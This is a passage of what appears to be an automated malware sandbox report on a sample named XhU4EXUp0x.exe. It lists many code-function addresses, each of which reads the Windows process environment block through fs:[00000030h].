          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A24015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A24015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0196B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0196B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0196B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0196B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01970050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01970050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A12073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A21074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A25BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01982397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01961B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01961B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A0D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A1138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01984BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01984BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01984BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A1131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0195F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0195DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01983B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01983B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0195DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A28B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0196AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0196AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01982ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01982AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0195AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0195AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01955210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01955210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01955210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01955210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01973A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01968A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01994A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01994A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A1AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A1AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A0B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A0B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A28A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019E4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01959240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01959240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01959240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01959240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0199927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A1EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A205AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A205AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01982581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01982581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01982581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01982581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01952D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01952D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01952D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01952D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01952D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01981DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01981DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01981DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019835A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A1FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A1FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A1FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A1FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A08DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0196D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0196D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A28D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A1E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01963D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01963D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01963D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01963D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01963D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01963D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01963D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01963D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01963D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01963D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01963D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01963D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01963D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01984D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01984D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01984D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0195AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019DA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01977D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01993D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A03D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0196849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A114FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A28CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A2740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A2740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A2740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019EC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019EC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01968794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019937F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019EFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019EFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A2070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A2070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01954F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01954F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A28F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0196EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0196FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A20EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A20EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A20EA5 mov eax, dword ptr fs:[00000030h]
